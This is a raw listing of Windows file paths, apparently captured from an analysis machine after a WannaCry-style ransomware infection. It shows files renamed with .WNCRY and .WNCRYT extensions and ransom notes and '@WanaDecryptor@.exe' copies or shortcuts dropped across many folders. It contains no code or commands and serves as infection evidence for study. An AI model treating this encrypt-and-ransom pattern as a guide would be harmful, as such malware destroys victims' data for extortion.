C:\Boot\pt-PT\~SD7897.tmp
C:\Boot\ru-RU\~SD7898.tmp
C:\Boot\sv-SE\~SD7899.tmp
C:\Boot\tr-TR\~SD78AA.tmp
C:\Boot\zh-CN\~SD78AB.tmp
C:\Boot\zh-HK\~SD78AC.tmp
C:\Boot\zh-TW\~SD78AD.tmp
C:\PerfLogs\~SD78AE.tmp
C:\PerfLogs\Admin\~SD78AF.tmp
C:\PSTranscripts\~SD78B0.tmp
C:\PSTranscripts\20251206\~SD78B1.tmp
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRYT
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRY
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRYT
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRY
C:\PSTranscripts\20251206\@Please_Read_Me@.txt
C:\PSTranscripts\20251206\@WanaDecryptor@.exe
C:\Recovery\~SD78C1.tmp
C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae\~SD78C2.tmp
C:\Sysmon\~SD78C3.tmp
C:\Sysmon\sysmonconfig.txt.WNCRYT
C:\Sysmon\sysmonconfig.txt.WNCRY
C:\Sysmon\@Please_Read_Me@.txt
C:\Sysmon\@WanaDecryptor@.exe
C:\Users\~SD78D4.tmp
C:\Users\All Users\~SD78D5.tmp
C:\Users\All Users\Adobe\~SD78D6.tmp
C:\Users\All Users\Adobe\ARM\~SD78D7.tmp
C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SD78E7.tmp
C:\Users\All Users\Adobe\Setup\~SD78F8.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\~SD78F9.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\~SD78FA.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms\~SD78FB.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\~SD790C.tmp
C:\Users\All Users\Boxstarter\~SD790D.tmp
C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRYT
C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRY
C:\Users\All Users\Boxstarter\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\@WanaDecryptor@.exe
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\~SD790E.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\~SD790F.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\~SD791F.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\~SD7920.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Common\~SD7941.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Common\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Common\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\~SD7942.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\~SD7943.tmp
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\~SD7953.tmp
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\@Please_Read_Me@.txt
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Boxstarter\BuildPackages\~SD7954.tmp
C:\Users\All Users\chocolatey\~SD7955.tmp
C:\Users\All Users\chocolatey\CREDITS.txt.WNCRYT
C:\Users\All Users\chocolatey\CREDITS.txt.WNCRY
C:\Users\All Users\chocolatey\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\@WanaDecryptor@.exe
C:\Users\All Users\chocolatey\.chocolatey\~SD7966.tmp
C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1\~SD7976.tmp
C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1\~SD7977.tmp
C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263\~SD7978.tmp
C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00\~SD7979.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0\~SD797A.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0\~SD797B.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0\~SD797C.tmp
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0\~SD798D.tmp
C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0\~SD798E.tmp
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0\~SD798F.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0\~SD7990.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0\~SD79A1.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1\~SD79A2.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5\~SD79A3.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13\~SD79A4.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1\~SD79B4.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13\~SD79B5.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1\~SD79B6.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13\~SD79B7.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1\~SD79B8.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930\~SD79B9.tmp
C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5\~SD79CA.tmp
C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88\~SD79CB.tmp
C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351\~SD79CC.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915\~SD79CD.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915\~SD79CE.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019\~SD79CF.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5\~SD79D0.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3\~SD79D1.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0\~SD79D2.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5\~SD79D3.tmp
C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827\~SD79E4.tmp
C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1\~SD79E5.tmp
C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1\~SD79E6.tmp
C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10\~SD79E7.tmp
C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2\~SD79E8.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332\~SD79E9.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501\~SD79EA.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104\~SD79EB.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201\~SD79EC.tmp
C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504\~SD79FC.tmp
C:\Users\All Users\chocolatey\bin\~SD79FD.tmp
C:\Users\All Users\chocolatey\bin\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\bin\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\config\~SD79FE.tmp
C:\Users\All Users\chocolatey\config\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\config\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\extensions\~SD79FF.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\~SD7A00.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\~SD7A01.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-core\~SD7A02.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-core\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\extensions\chocolatey-core\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\~SD7A13.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\~SD7A14.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\helpers\~SD7A15.tmp
C:\Users\All Users\chocolatey\helpers\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\helpers\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\helpers\functions\~SD7A16.tmp
C:\Users\All Users\chocolatey\helpers\functions\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\helpers\functions\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\lib\~SD7A65.tmp
C:\Users\All Users\chocolatey\lib\7zip\~SD7A76.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\~SD7A86.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\legal\~SD7A87.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\tools\~SD7A98.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\~SD7A99.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\~SD7AA9.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRY
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter\~SD7ABA.tmp
C:\Users\All Users\chocolatey\lib\boxstarter\tools\~SD7ABB.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\~SD7ABC.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\~SD7ABD.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\~SD7ABE.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\~SD7ABF.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\~SD7AFF.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\~SD7B0F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\~SD7B3F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\~SD7B5F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\~SD7C2B.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\~SD7C9A.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\~SD7D18.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\~SD7D19.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\~SD7D97.tmp
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\~SD7DF6.tmp
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\~SD7E83.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\~SD7ED2.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\~SD7EF3.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\~SD7F71.tmp
C:\Users\All Users\chocolatey\lib\chocolatey\~SD7FA0.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\~SD7FD0.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\~SD7FF1.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\~SD805F.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\~SD80AE.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\~SD80FD.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\~SD814C.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\~SD817C.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\~SD81CB.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\~SD820B.tmp
C:\Users\All Users\chocolatey\lib\dotnet\~SD822B.tmp
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\~SD828A.tmp
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\~SD82AA.tmp
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\~SD82EA.tmp
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\~SD830A.tmp
C:\Users\All Users\chocolatey\lib\dotnet-runtime\~SD831A.tmp
C:\Users\All Users\chocolatey\lib\dotnetfx\~SD832B.tmp
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\~SD832C.tmp
C:\Users\All Users\chocolatey\lib\Firefox\~SD833D.tmp
C:\Users\All Users\chocolatey\lib\Firefox\tools\~SD834D.tmp
C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRY
C:\Users\All Users\chocolatey\lib\GoogleChrome\~SD83AC.tmp
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\~SD83DC.tmp
C:\Users\All Users\chocolatey\lib\jre8\~SD843B.tmp
C:\Users\All Users\chocolatey\lib\jre8\tools\~SD847A.tmp
C:\Users\All Users\chocolatey\lib\KB2919355\~SD84E9.tmp
C:\Users\All Users\chocolatey\lib\KB2919355\tools\~SD8538.tmp
C:\Users\All Users\chocolatey\lib\KB2919442\~SD8539.tmp
C:\Users\All Users\chocolatey\lib\KB2919442\tools\~SD853A.tmp
C:\Users\All Users\chocolatey\lib\KB2999226\~SD8589.tmp
C:\Users\All Users\chocolatey\lib\KB2999226\tools\~SD85B9.tmp
C:\Users\All Users\chocolatey\lib\KB3033929\~SD8627.tmp
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\~SD8686.tmp
C:\Users\All Users\chocolatey\lib\KB3035131\~SD86D5.tmp
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\~SD86F5.tmp
C:\Users\All Users\chocolatey\lib\KB3063858\~SD8735.tmp
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\~SD8765.tmp
C:\Users\All Users\chocolatey\lib\KB3118401\~SD87B4.tmp
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\~SD87E4.tmp
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\~SD87E5.tmp
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\~SD87F5.tmp
C:\Users\All Users\chocolatey\lib\openjdk\~SD8806.tmp
C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\lib\openjdk\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\lib\openjdk\tools\~SD8884.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\~SD8894.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\tools\~SD88B5.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRY
C:\Users\All Users\chocolatey\lib\python3\~SD8904.tmp
C:\Users\All Users\chocolatey\lib\python3\legal\~SD8914.tmp
C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\python3\tools\~SD8944.tmp
C:\Users\All Users\chocolatey\lib\tapwindows\~SD8955.tmp
C:\Users\All Users\chocolatey\lib\tapwindows\tools\~SD8966.tmp
C:\Users\All Users\chocolatey\lib\vcredist140\~SD8976.tmp
C:\Users\All Users\chocolatey\lib\vcredist140\tools\~SD89A6.tmp
C:\Users\All Users\chocolatey\lib\vcredist2005\~SD89B7.tmp
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\~SD89C7.tmp
C:\Users\All Users\chocolatey\lib\vcredist2008\~SD89C8.tmp
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\~SD89E9.tmp
C:\Users\All Users\chocolatey\lib\vcredist2015\~SD8A28.tmp
C:\Users\All Users\chocolatey\lib\winrar\~SD8A96.tmp
C:\Users\All Users\chocolatey\lib\winrar\tools\~SD8AD6.tmp
C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRY
C:\Users\All Users\chocolatey\lib-bad\~SD8B44.tmp
C:\Users\All Users\chocolatey\lib-bad\adobereader\~SD8BA3.tmp
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\~SD8BE3.tmp
C:\Users\All Users\chocolatey\logs\~SD8C41.tmp
C:\Users\All Users\chocolatey\redirects\~SD8C90.tmp
C:\Users\All Users\chocolatey\redirects\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\redirects\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\tools\~SD8D4D.tmp
C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRYT
C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRY
C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRYT
C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRY
C:\Users\All Users\chocolatey\tools\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\tools\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\~SD8E19.tmp
C:\Users\All Users\Microsoft\Assistance\~SD8EA7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\~SD8EB7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\1.0\~SD8EF7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\~SD8F17.tmp
C:\Users\All Users\Microsoft\ClickToRun\~SD8F47.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\~SD8F48.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\~SD8F49.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\~SD8F4A.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\~SD8F4B.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\~SD8F5C.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\~SD8F6C.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\~SD8F8C.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\~SD8FDC.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\~SD902B.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16\~SD90E7.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16\~SD9117.tmp
C:\Users\All Users\Microsoft\ClickToRun\UserData\~SD9147.tmp
C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\~SD9186.tmp
C:\Users\All Users\Microsoft\Crypto\~SD91B6.tmp
C:\Users\All Users\Microsoft\Crypto\DSS\~SD91B7.tmp
C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys\~SD91B8.tmp
C:\Users\All Users\Microsoft\Crypto\Keys\~SD91B9.tmp
C:\Users\All Users\Microsoft\Crypto\PCPKSP\~SD91BA.tmp
C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK\~SD91BB.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\~SD91BC.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys\~SD91BD.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\~SD91CE.tmp
C:\Users\All Users\Microsoft\Device Stage\~SD91CF.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\~SD91D0.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\~SD91D1.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\~SD91D2.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\~SD91D3.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\~SD91D4.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\~SD91F4.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\~SD9272.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\~SD92B2.tmp
C:\Users\All Users\Microsoft\DeviceSync\~SD92D2.tmp
C:\Users\All Users\Microsoft\Diagnosis\~SD9302.tmp
C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader\~SD9341.tmp
C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\~SD93B0.tmp
C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\~SD93FF.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\~SD943E.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger\~SD945F.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\~SD94AE.tmp
C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore\~SD951C.tmp
C:\Users\All Users\Microsoft\Diagnosis\Sideload\~SD955C.tmp
C:\Users\All Users\Microsoft\DRM\~SD958B.tmp
C:\Users\All Users\Microsoft\DRM\Server\~SD95DB.tmp
C:\Users\All Users\Microsoft\EdgeUpdate\~SD962A.tmp
C:\Users\All Users\Microsoft\EdgeUpdate\Log\~SD9669.tmp
C:\Users\All Users\Microsoft\eHome\~SD9689.tmp
C:\Users\All Users\Microsoft\eHome\logs\~SD96E8.tmp
C:\Users\All Users\Microsoft\Event Viewer\~SD9737.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\~SD9767.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\~SD9797.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\~SD97D7.tmp
